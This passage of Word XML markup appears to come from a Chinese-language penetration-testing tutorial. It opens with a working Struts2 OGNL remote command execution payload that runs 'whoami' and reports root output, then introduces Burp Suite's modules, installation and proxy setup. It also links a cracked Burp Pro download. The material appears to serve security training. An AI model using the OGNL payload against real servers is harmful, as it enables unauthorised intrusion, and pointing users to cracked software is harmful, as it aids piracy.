      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CFF363C" wp14:editId="05D05B0A">
            <wp:extent cx="5274310" cy="28809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80995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>在输入框中提交如下信息即可远程执行命令（执行的命令如红色标识的部分）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionCont</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:lastRenderedPageBreak/>
        <w:t>ext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t>').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4"/>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出执行的结果：当前的用户为root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25414DCD" wp14:editId="555269AB">
            <wp:extent cx="5274310" cy="2825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25115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc499884687"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc499884688"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="6" w:lineRule="atLeast"/>
        <w:ind w:left="220" w:right="220" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Burp Suite 是用于攻击web 应用程序的集成平台</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它包含了许多工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有的工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>共享一个HTTP 消息</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。其多种功能可以帮我们执行各种任务，比如请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查，除此之外，他还能与其它工具拓展使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="6" w:lineRule="atLeast"/>
        <w:ind w:left="220" w:right="220" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>urpsuite主窗口界面如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55ACA7CD" wp14:editId="5BAE45C7">
            <wp:extent cx="4904993" cy="3620770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="图片 57" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\DQMYJ23AHTUE(LSR%[Q0W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ocuments\Tencent Files\2227891138\Image\C2C\DQMYJ23AHTUE(LSR%[Q0WAQ.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4910669" cy="3624960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:left="220" w:right="220" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>主要包括以下模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="90" w:firstLine="216"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>显示目标目录结构的的一个功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:left="220" w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proxy——是一个拦截HTTP/S的代</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:left="220" w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spider——是一个应用智能感应的网络爬虫，它能完整的枚举应用程序的内容和功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:left="220" w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scanner——是一个高级的工具，执行后，它能自动地发现web 应用程序的安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:left="220" w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intruder——是一个定制的高度可配置的工具，对web应用程序进行自动化攻击，如：枚举标识符，收集有用的数据，以及使用fuzzing 技术探测常规漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="100" w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Repeater——</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一个靠手动操作来触发单独的HTTP 请求，并分析应用程序响应的工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="100" w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sequencer——是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="90" w:firstLine="216"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Decoder——是一个进行手动执行或对应用程序数据者智能解码编码的工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="100" w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comparer——是一个实用的工具，通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLineChars="100" w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extender</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以让你加载Burp Suite的扩展，使用你自己的或第三方代码来扩展Burp Suit的功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Options(设置)——对Burp Suite的一些设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite是一个无需安装软件，下载完成后，直接双击打开即可。但Burp Suite是用Java语言开发的，运行时依赖于JRE，需要提前安装Java环境。安装完Java环境之后，首先验证Java配置是否正确，如果输入java -version 出现下图的结果，证明配置正确且已完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="comments-section"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="204" w:afterAutospacing="0"/>
        <w:ind w:right="220" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B7C91F" wp14:editId="70AB7E54">
            <wp:extent cx="4924425" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="159" name="图片 159" descr="java环境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ava环境验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4D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>urp免费版下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId149" w:history="1">
        <w:r w:rsidRPr="00A603D8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp/freedownload/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专业破解版下载地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp://10.180.187.2/%B9%A4%BE%DF/burpsuite_pro_v1.7.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工作流程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proxy（代理工具）可以说是Burp Suite测试流程的一个心脏，它可以通过浏览器浏览应用程序来捕获所有相关信息，这个过程将填充代理的历史（http history）和站点地图（site map）所有请求的内容。在站点地图中也可以显示未经请求的站点(灰色显示，通过spider被动爬行)。然后可以将http history或者site map中的http 请求或响应，发送到scanner进行漏洞分析，发送到repeater来手动攻击，发送到intruder来构造自定义的攻击，发送到sequencer测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>应用程序的session tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLineChars="90" w:firstLine="216"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1A5512" wp14:editId="533E9DC8">
            <wp:extent cx="4343400" cy="54197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4343400" cy="5419725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代理配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.4.1浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配置代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工具&gt;&gt;Internet选项&gt;&gt;连接&gt;&gt;局域网&gt;&gt;勾选代理服务器填写地址127.0.0.1端口8080，这里端口可以随便定义但是要跟burp的监听端口要一致。</w:t>
      </w:r>
    </w:p>
